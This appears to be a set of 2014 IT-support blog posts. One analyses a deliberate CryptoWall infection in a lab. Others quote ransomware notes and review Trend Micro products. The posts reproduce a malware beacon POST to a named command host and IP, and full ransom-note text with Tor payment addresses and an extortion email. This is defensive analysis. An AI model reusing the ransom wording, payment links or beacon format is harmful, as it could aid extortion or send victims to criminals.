Infecting myself with Ransomware (Exploring CryptoWall)

What, am I crazy ?

No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt,  wireshark for packet sniffing and Sysinternals Process Monitor.

So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.

So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.

There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.

As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.

PDF file

So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.

startup

 

Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.

hidden folder on c

 

So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe”  file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.

I watch it connect to 199.127.225.232 and do a HTTP post. This server is called babyslutsnil.com

POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache

 z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

 

html
head
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
body
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the  code i (confdir) /i /templates /code  directory.  The location of the  code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file.  (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
/body
/html

I can only assume it is trying to send out the RSA encryption key to the remote server.

Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).

decryot files

Then you find a key in the registry which starts off the same as the exe file name

registry

 

and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.

 

startup1

 

Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !

pay

It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.

Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.

Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.

Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!

Moral: Have offline current backups !

 

 

Tags: , , ,

CryptoWall

Oh Dear, just had someone contact us whom has CryptoWall. All their work files are encrypted.

Looks like a staff member opened an attachment through Hotmail.
This Symantec link eludes to a new variant. http://www.symantec.com/security_response/writeup.jsp?docid=2014-061923-2824-99

This particular infection looks different to the previous ones. Still digging through it to figure out what the deal is. We have recovered 99% of their data from backups and Volume Shadow Copy.

Here’s the file placed in various folders on thir server

BD995470B3904425B4FEAE109E797A49

What happened to your files ?
All of your files were protected by a strong encryption with RSA-2048 using CryptoWall.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)
What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.
How did this happen ?
Especially for you, on our server was generated the secret key pair RSA-2048 – public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
What do I do ?
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1.https://kpai7ycr7jxqkilp.enter2tor.com/9R08
2.https://kpai7ycr7jxqkilp.tor2web.org/9R08
3.https://kpai7ycr7jxqkilp.onion.to/9R08

If for some reasons the addresses are not available, follow these steps:
1.Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2.After a successful installation, run the browser and wait for initialization.
3.Type in the address bar: kpai7ycr7jxqkilp.onion/9R08
4.Follow the instructions on the site.
IMPORTANT INFORMATION:
Your personal page: https://kpai7ycr7jxqkilp.enter2tor.com/9R08
Your personal page (using TOR): kpai7ycr7jxqkilp.onion/9R08
Your personal identification number (if you open the site (or TOR ‘s) directly): 9R08

Tags: , ,

Upgrade to Trend Micro Worry Free 9 causes 10 minute stall when plugging in USB storage

On one of our installations, since installing TMWF9, whenever a USB drive (Hard disk or Flash media) is installed to the Master server, explorer stops responding for 10 minutes.

Remote access for file shares on servers still works. Sharepoint, Exchange and other services are unaffected. It is just the Explorer Windows on the local server console (Which is used for the Browse feature or File explorer /My Computer).

If you open the Disk Management before inserting the drive, you note that a volume comes up, then it all stalls and the disk is not allocated a drive letter for 10 minutes.

From a command prompt, if you try and move to that disk, it stalls. If you try a non existant disk, it comes back “drive not found”. In this way I know I can navigate using CMD and switch between drive letters to valid letters, just not this new volume.  It seems the drive has started allocating resouces but it is not yet available for use.

If during this time you try and stop the Trend Agent – real-time scan service, it hangs whilst stopping until the 10 minutes is up.

If we halt that service first, USB drives go in and out as normal. If we do not halt it or it restarts, when inserting a drive, Explorer hangs again for 10 minutes.

After 10 minutes, the drive volume appears, Explorer responds and everything goes back to normal.

There are no events recorded in the EventLog :(

Tags: , , ,

Cryptolocker (Again, new and improved ?)

UPDATE: Be sure to read the comments to this post. I am posting new information and updates as comments. There is a lot of information there.

 

Yes, again we see Cryptolocker. My client emailed me the following “I received an email on Friday from Energy Australia that took me to a website and it asked me to run a program but I could not open anything I believe that email may have caused this issue if that is of any help”

This falls in line with other peoples observations i.e. http://blogs.appriver.com/Blog/bid/102814/New-CryptoLocker-Has-a-Walkabout

 

We have not yet worked out how this version works nor what files have been affected. Here is the text

  !!! YOUR SYSTEM IS HACKED !!! All your files was encrypted with Cryptolocker!   This means that without the decryption key the recovery of your files is not possible, If your files have a value to you and you are willing to pay me for the decryption key please contact me: decrypt-request@mail.ua   You have 3 days to pay for my services. After this period, you will lose all your files.   Anti-virus software can remove Cryptolocker, but can not decrypt your fles. The only way to recover your files -is to pay for the decryption key.   Information for IT-specialist:   Data was encrypted with AES (Rijndael) algorithm with the session key length if 256 bits. Session key is encrypted with RSA (2048 bits) algorithm. Public-key is enclosed into Cryptolocker. Private-key for decryption of the session key is stored only in my database. To crack this key, you will need more than a million years time.

Here is a photo
Img_0804ed2

This is the nasty email that began it all

email

 

 

 

 

Tags: ,

Real world test of Trend Worry Free Professional

I miss Microsoft ISA/TMG. I miss being able to report staff’s internet usage, solve bottlenecks, isolate PC’s that have downloaded Malware and all the other general IT admin things that go with this.
Along comes Trend Worry Free Professional which allows you to setup your browser to the external proxy in Trend Micro’s Amazon cloud.

You can setup Ldap integration with your AD and then after the staff have used it, do reports on their activity.

This all sounds really nice.

So what are the real world issues with this product?

  • Using it from South Australia and using Proxy servers on the eastern side of Australia, my latency is huge. It adds 30 ms. A slow ADSL2+ connection feels this badly. All my pages are delayed and slow coming up. The experience over fibre or in the eastern states is far less exaggerated.
  •  I keep getting certificate popups. I get it for my email (Especially using Office 365), I get it for many of the HTTPS sites I use.
  • The proxy settings are easy to tamper with. Unless you lock IE settings down or force the settings via Group policy, users can bypass the proxy.
  • I have a few websites that “sometimes work”. One happens to be my webmail. The experience is very hit and miss with the proxy turned on.
  • The built in reports are very basic. They don’t give me enough detail.

Ok, this all sounds really bad. Yes, there are some teething issues and the latency is killing me so why do I love this product ?

  • It filters all my outbound web traffic and removes Malware and viruses instantly as discovered.
  • I can dump the raw logs into Excel an do my own reports.
  • I can have external roaming users logged into this no matter where they are in the world.
  • I have control of what happens on the network.

So if you have Fibre, are in the eastern states or have a client with very little expectations (maybe they are not a big internet user) then this is an awesome tool.

If you are a geek like me, you have to work out if the tool makes your habits safer and live with it, or forge ahead as the speed annoyed you and run other protection.

Don’t forget, this is only version 1, future advancements will help.

Tags: ,

Trend Micro Worry Free 9 attachment blocking

We have just upgraded a client to TMWF9 (Another one in a long list of clients to upgrade). In the products previous configuration, attachment blocking was turned on.
Exceptions were set to allow most Microsoft Office documents in. This included Word Doc and Docx format.

After the upgrade, the attachment policy is still the same. The Doc and Docx files are allowed through however, they are not getting through.

They are being replaced with the text file saying that the attachment was removed due to policy.

We have tried turning the Attachment blocking on / off and turning the exception for Word on and off.

 

We have a case open with Trend. The only work around presently is to disable attachment blocking.

NOTE: Be aware. If Attachment blocking is on, Scanmail stomps around in your email store removing all attachments that match. Even if the attachments were placed into your mailbox years ago. It is not just an attachment blocker but also a remover of existing attachments. Don’t play with attachment blocking until you understand this.

Tags: , ,